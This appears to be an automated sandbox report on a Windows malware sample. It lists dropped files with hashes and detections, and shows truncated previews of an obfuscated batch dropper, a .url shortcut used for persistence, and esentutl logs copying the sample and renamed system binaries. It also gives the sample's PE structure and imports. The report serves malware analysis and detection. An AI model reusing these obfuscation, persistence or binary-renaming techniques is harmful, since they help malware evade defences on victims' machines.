                                                                    SHA1:43685959B153D4BBE722D57B227ABB3614483E7C
                                                                    SHA-256:F896A2CE7170D361C69C487E2A04F41408F4241BB42630574DFE09CE94832B5D
                                                                    SHA-512:5D12C0B9F2AF1CB85899A20E262FF880A3CEFDD76CE598D6FC08C4D9809ABB30228E815FED21DF568D9194077378C5A989985580FD1D5900A7625EA2CD7C5B50
                                                                    Malicious:true
                                                                    Preview:...N...@..............................................................................................................................N...@..............N...@............i._...Q1|.17M...&.-......}%....).H..~J...$.^..OA!.!O.^.........<..T.oD.....n...\...2.E....&.I.y..zH..M.gL....O.qR.U.....7...(...UJ.....VHL...'DCVe..8.M...o..R..._../.D..t^....9IDp.....n:W.'.-.h..\MO...)H9....F.._..@.;.DW.J.....Q..*.O:-O0.H:.]H.9CG'%...#.F.,.F./B..1.2.D..m..9IJ/EI..2....V.%.A....f.mI.{..e.C..Is....{.H..7wn....Fl/..]b.kD..XF..2T.......4.E$.tH.N.cF.>....Y..p3..%..j.N..;E..cC.....V.....N........#k^..(.@..............Y(m....aV..3F..._.q(..&.v..:.6....w..7.F(.H./.^..[.m....o.1......G...........%.......'GJ..o$Z....k....n.V..N..^...VN.M.QG....W..&...(.d.U...@.rnf........#...sI...&...].3.....2...../.D.o.l..[........dO....O.7.A...2....7.H..lg.....s...tV.w...~...U..Q.~..........U^.+OE....\...f....6w...,...k@KBv...aB.iL....q.......Gb.

                                                                    C:\Users\Public\Libraries\Wuqtggvo.PIF

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1244672
                                                                    Entropy (8bit):7.217395439367395
                                                                    Encrypted:false
                                                                    SSDEEP:24576:2o8jIfzBmV+MtCxqwFs0beRsSn8T788CRNM:2wf8BZn8TY5
                                                                    MD5:1A4D920B70293F85958A9A2CDE581F6F
                                                                    SHA1:756015AE8F1B03F14BC1126E6B2183A383631186
                                                                    SHA-256:02EEC111BA55308C1D91C49EE08CB2D6C00D50893596CEEF03F7664403175617
                                                                    SHA-512:CEAE945E81F37BB3EA8B52177801FD9921B84B63FBB07CAC8877544B21DCEE136344348ADAF09C43D392D1D0B738B5B941E28F96574A8503167B4D00D3C67A2F
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 58%
                                                                    • Antivirus: Virustotal, Detection: 68%, Browse
                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................J......T.............@..............................................@...............................%..............................lf...................................................................................text...t........................... ..`.itext.............................. ..`.data..............................@....bss.....6...........`...................idata...%.......&...`..............@....tls....4................................rdata..............................@..@.reloc..lf.......h..................@..B.rsrc...............................@..@....................................@..@................................................................................................

                                                                    C:\Users\Public\Libraries\ovggtquW.cmd

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):62357
                                                                    Entropy (8bit):4.705712327109906
                                                                    Encrypted:false
                                                                    SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                    MD5:B87F096CBC25570329E2BB59FEE57580
                                                                    SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                    SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                    SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                    Malicious:true
                                                                    Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

                                                                    C:\Users\Public\Wuqtggvo.url

                                                                    Download File
                                                                    Process:C:\Users\user\Desktop\nft438A5fN.exe
                                                                    File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF">), ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):104
                                                                    Entropy (8bit):5.1832238533158925
                                                                    Encrypted:false
                                                                    SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMMLIsbxzoPYv:HRYFVmTWDyzpsExzoPC
                                                                    MD5:000F5057DD458226A681D694D834A61F
                                                                    SHA1:E362607B872F49D1ABD195FF6B58B2D55BBDE539
                                                                    SHA-256:C1977F492C8A48A643E8950C7BB1B3B719A64FC3414EC0BDE950A45108983D6D
                                                                    SHA-512:123BE44C31B1DC090934C48E8D59D4C5FE1F920D71336593E0742563F6E371C470ADD254BCA62F8A26A92F6EA231B93743E702867EECF8F41AD93326C853F7C0
                                                                    Malicious:true
                                                                    Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF"..IconIndex=962230..HotKey=19..

                                                                    C:\Users\Public\alpha.pif

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):236544
                                                                    Entropy (8bit):6.4416694948877025
                                                                    Encrypted:false
                                                                    SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                    MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                    SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                    SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                    SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Joe Sandbox View:
                                                                    • Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse
                                                                    • Filename: IBKB.vbs, Detection: malicious, Browse
                                                                    • Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious, Browse
                                                                    • Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse
                                                                    • Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse
                                                                    • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                    • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse
                                                                    • Filename: x.exe, Detection: malicious, Browse
                                                                    • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
                                                                    • Filename: #U00c1raj#U00e1nlat k#U00e9r#U00e9s MOL093478524#U00b7docx.exe, Detection: malicious, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

                                                                    C:\Users\Public\xpha.pif

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):18944
                                                                    Entropy (8bit):5.742964649637377
                                                                    Encrypted:false
                                                                    SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                    MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                    SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                    SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                    SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                    Malicious:false
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                    • Antivirus: Virustotal, Detection: 0%, Browse
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z..................*...2......P4.......@....@..................................c....@...... ..........................`a..|....p.. ...............................T............................................`..\............................text....).......*.................. ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                    C:\Windows\appcompat\Programs\Amcache.hve

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                    File Type:MS Windows registry file, NT/2000 or above
                                                                    Category:dropped
                                                                    Size (bytes):1835008
                                                                    Entropy (8bit):4.372891531471667
                                                                    Encrypted:false
                                                                    SSDEEP:6144:5FVfpi6ceLP/9skLmb08yWWSPtaJG8nAge35OlMMhA2AX4WABlguN8iL:vV1qyWWI/glMM6kF7aq
                                                                    MD5:626D8717F3E7E21039967F7D6F41C763
                                                                    SHA1:40C2616DB3DFE75DE18A08C446924BF670CACD27
                                                                    SHA-256:59E03BD370EB4CD18DE4CD773D53CF87C52284B5B0A609C8ECB4DC3DD64B44E7
                                                                    SHA-512:0BC19C20F0ED2D6CF10C4080D72F01BC4AACF68BF1368FECE8D1C7CAE9E5233E2871486BC52DA5729479ACACE57DFF013B2F56D47EFA750438007D795881648D
                                                                    Malicious:false
                                                                    Preview:regfD...D....\.Z.................... ....0......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmR*..?..............................................................................................................................................................................................................................................................................................................................................&O.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                    \Device\ConDrv

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                    Category:dropped
                                                                    Size (bytes):591
                                                                    Entropy (8bit):4.677517157262383
                                                                    Encrypted:false
                                                                    SSDEEP:12:qL1xTzAeSbZ7u0wxDDDDDDDDjCaY5yemlaYAmVV4TB8NGNt:+1xTzAp7u0wQakyDlag/4t8N2
                                                                    MD5:3B12CE324B1724A35CE83A7E4AF2D3AD
                                                                    SHA1:49E2BE1BC9C6750E55E0A36651ACA814CDE99232
                                                                    SHA-256:A2EA6C0DEA1DFF281DD18E008AD7BA5FCC64B4CA3A057EEB716360176FEDC4C8
                                                                    SHA-512:6073B1D545BF646C073B7D54A8BFDAF11937041D3020DAF330333B368C7FF47AF738F383D1399B4EE0F8ECCD3C8DF2143E66E2DA47FC5794E5078536D00EAA6D
                                                                    Malicious:false
                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\nft438A5fN.exe...Destination File: C:\\Users\\Public\\Libraries\\Wuqtggvo.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x12fe00 (1244672) (1 MB)....Total bytes written = 0x130000 (1245184) (1 MB).......Operation completed successfully in 0.157 seconds.....

                                                                    \Device\Null

                                                                    Download File
                                                                    Process:C:\Windows\SysWOW64\esentutl.exe
                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                    Category:dropped
                                                                    Size (bytes):560
                                                                    Entropy (8bit):4.531408806270406
                                                                    Encrypted:false
                                                                    SSDEEP:12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGN2FI:/p4xT5cp7u0wQakB4aV4t8N0
                                                                    MD5:EE7187E169AF0EDE104977788ECC390D
                                                                    SHA1:5A796ECD0808A540F708BFA4C43FF5295B324F23
                                                                    SHA-256:2E0D33DC849A7490058C38486E17F33365411663130ABCBDBA5A2293646B07CB
                                                                    SHA-512:53ED16BD667612A24E5840B86902ABCE2E4C2B22471CBE3923490448719CE1F0D48DCD2D8DF38F66F572C4EE39CFE5C52190BBDD2B3237F5C38CE556C2ED8C8D
                                                                    Malicious:false
                                                                    Preview:..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... |----|----|----|----|----|----|----|----|----|----|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.47 seconds.....

                                                                    Static File Info

                                                                    General

                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                    Entropy (8bit):7.217395439367395
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.81%
                                                                    • Windows Screen Saver (13104/52) 0.13%
                                                                    • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    File name:nft438A5fN.exe
                                                                    File size:1'244'672 bytes
                                                                    MD5:1a4d920b70293f85958a9a2cde581f6f
                                                                    SHA1:756015ae8f1b03f14bc1126e6b2183a383631186
                                                                    SHA256:02eec111ba55308c1d91c49ee08cb2d6c00d50893596ceef03f7664403175617
                                                                    SHA512:ceae945e81f37bb3ea8b52177801fd9921b84b63fbb07cac8877544b21dcee136344348adaf09c43d392d1d0b738b5b941e28f96574a8503167b4d00d3c67a2f
                                                                    SSDEEP:24576:2o8jIfzBmV+MtCxqwFs0beRsSn8T788CRNM:2wf8BZn8TY5
                                                                    TLSH:4B45ADC325634B2FCAF1C979A8569A6464147DE22B247F4FF5B3718C9F252C0BC39A12
                                                                    File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                    File Icon

                                                                    Icon Hash:61c4ad0e33096c74

                                                                    Static PE Info

                                                                    General

                                                                    Entrypoint:0x45c754
                                                                    Entrypoint Section:.itext
                                                                    Digitally signed:false
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                    DLL Characteristics:
                                                                    Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b679c9cad73e147b0713738ca714f5d5

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    add esp, FFFFFFF0h
                                                                    mov eax, 0045B544h
                                                                    call 00007F05F10340C9h
                                                                    mov eax, dword ptr [00467940h]
                                                                    mov eax, dword ptr [eax]
                                                                    call 00007F05F108189Dh
                                                                    mov ecx, dword ptr [00467A30h]
                                                                    mov eax, dword ptr [00467940h]
                                                                    mov eax, dword ptr [eax]
                                                                    mov edx, dword ptr [0045AEC0h]
                                                                    call 00007F05F108189Dh
                                                                    mov eax, dword ptr [00467940h]
                                                                    mov eax, dword ptr [eax]
                                                                    call 00007F05F1081911h
                                                                    call 00007F05F1032150h
                                                                    lea eax, dword ptr [eax+00h]
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al
                                                                    add byte ptr [eax], al

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x6c0000x2500.idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x780000xc0e00.rsrc
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x710000x666c.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x700000x18.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x6c6f00x5c4.idata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x5a7740x5a8007c9ce1d733bbc429171d5167d6681480False0.5200222289364641data6.522741624839106IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .itext0x5c0000x79c0x8006e4a44453cf9bbde15103dda026c0a58False0.60498046875data6.100900928490729IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .data0x5d0000xaacc0xac009cc769e166ed870f93f4e2def065e518False0.08287154796511628data5.8144016898189IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .bss0x680000x36c40x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .idata0x6c0000x25000x260095282f58a0dda4b5380f300a1f41284cFalse0.31938733552631576data5.125844410171861IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .tls0x6f0000x340x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rdata0x700000x180x200678a973f6de20f6c8b027c1addc26f02False0.05078125data0.19586940608732903IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .reloc0x710000x666c0x68008dc19538a3a6bfdbbea2abadab490aa4False0.6361177884615384data6.665561766810042IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    .rsrc0x780000xc0e000xc0e00d322748776c5ee5d78abdc4829f96a3eFalse0.5445775781756319data6.983878399808079IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                    Resources

                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                    RT_CURSOR0x78b8c0x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                    RT_CURSOR0x78cc00x134dataEnglishUnited States0.4642857142857143
                                                                    RT_CURSOR0x78df40x134dataEnglishUnited States0.4805194805194805
                                                                    RT_CURSOR0x78f280x134dataEnglishUnited States0.38311688311688313
                                                                    RT_CURSOR0x7905c0x134dataEnglishUnited States0.36038961038961037
                                                                    RT_CURSOR0x791900x134dataEnglishUnited States0.4090909090909091
                                                                    RT_CURSOR0x792c40x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                    RT_BITMAP0x793f80x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                    RT_BITMAP0x795c80x1e4Device independent bitmap graphic, 36 x 19 x 4, image size 380EnglishUnited States0.46487603305785125
                                                                    RT_BITMAP0x797ac0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.43103448275862066
                                                                    RT_BITMAP0x7997c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39870689655172414
                                                                    RT_BITMAP0x79b4c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.4245689655172414
                                                                    RT_BITMAP0x79d1c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5021551724137931
                                                                    RT_BITMAP0x79eec0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5064655172413793
                                                                    RT_BITMAP0x7a0bc0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                    RT_BITMAP0x7a28c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.5344827586206896
                                                                    RT_BITMAP0x7a45c0x1d0Device independent bitmap graphic, 36 x 18 x 4, image size 360EnglishUnited States0.39655172413793105
                                                                    RT_BITMAP0x7a62c0xb5198Device independent bitmap graphic, 816 x 303 x 24, image size 741744EnglishUnited States0.5634079462485037
                                                                    RT_BITMAP0x12f7c40xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.4870689655172414
                                                                    RT_ICON0x12f8ac0x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m0.46365248226950356
                                                                    RT_ICON0x12fd140x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m0.3290983606557377
                                                                    RT_ICON0x13069c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m0.2628986866791745
                                                                    RT_ICON0x1317440x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m0.19533195020746888
                                                                    RT_ICON0x133cec0x25e8Device independent bitmap graphic, 65 x 216 x 8, image size 7344, resolution 3779 x 3779 px/m, 256 important colors0.1458161582852432
                                                                    RT_DIALOG0x1362d40x52data0.7682926829268293
                                                                    RT_DIALOG0x1363280x52data0.7560975609756098
                                                                    RT_STRING0x13637c0x34data0.5
                                                                    RT_STRING0x1363b00x2b0data0.4752906976744186
                                                                    RT_STRING0x1366600xb8data0.6793478260869565
                                                                    RT_STRING0x1367180xecdata0.6398305084745762
                                                                    RT_STRING0x1368040x2f0data0.4587765957446808
                                                                    RT_STRING0x136af40x3d0data0.38729508196721313
                                                                    RT_STRING0x136ec40x370data0.4022727272727273
                                                                    RT_STRING0x1372340x3ccdata0.33539094650205764
                                                                    RT_STRING0x1376000x214data0.49624060150375937
                                                                    RT_STRING0x1378140xccdata0.6274509803921569
                                                                    RT_STRING0x1378e00x194data0.5643564356435643
                                                                    RT_STRING0x137a740x3c4data0.3288381742738589
                                                                    RT_STRING0x137e380x338data0.42961165048543687
                                                                    RT_STRING0x1381700x294data0.42424242424242425
                                                                    RT_RCDATA0x1384040x10data1.5
                                                                    RT_RCDATA0x1384140x2e8data0.7110215053763441
                                                                    RT_RCDATA0x1386fc0x449Delphi compiled form 'TForm1'0.4813126709206928
                                                                    RT_GROUP_CURSOR0x138b480x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                    RT_GROUP_CURSOR0x138b5c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                    RT_GROUP_CURSOR0x138b700x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                    RT_GROUP_CURSOR0x138b840x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                    RT_GROUP_CURSOR0x138b980x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                    RT_GROUP_CURSOR0x138bac0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                    RT_GROUP_CURSOR0x138bc00x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                    RT_GROUP_ICON0x138bd40x4cdata0.8421052631578947

                                                                    Imports

                                                                    DLLImport
                                                                    oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                    advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                    user32.dllGetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
                                                                    kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                    kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
